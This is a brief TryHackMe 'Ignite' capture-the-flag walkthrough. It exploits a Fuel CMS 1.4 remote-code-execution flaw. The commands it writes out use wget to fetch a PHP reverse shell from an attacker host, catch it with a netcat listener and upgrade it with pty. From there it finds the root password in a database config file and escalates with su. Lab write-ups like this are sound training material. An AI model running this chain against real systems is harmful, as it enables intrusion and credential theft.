[WALKTROUGH] [THM] IGNITE ctf

[WALKTROUGH] [THM] IGNITE ctf

·

1 min read

First let's start with enumeration on the target

image.png

we can see there is a web server :

image.png running on Fuel CMS 1.4, what is vulnerable to "CVE-2018-16763." (RCE)

here is a script to exploit it in python just remove the proxy usage fonction on it

image.png

as you can see i can execute commands, so let's make a reverse shell ! for this i use the shell from pentest monkey

open a web server

python3 -m http.server

download it on the target with

wget http://10.9.1.161:8000/shell.php

listen to our port with netcat to get the shell

nc -nvlp 1337

and execute the shell like

php shell.php

image.png

spawn a shell to get full terminal

python -c ‘import pty; pty.spawn(“/bin/bash”)’

image.png

after searching a little bit for the password i find the file

/var/www/html/fuel/application/config/database.php

where the root password is in clear

su root

and to get the root password :

cat /root/root.txt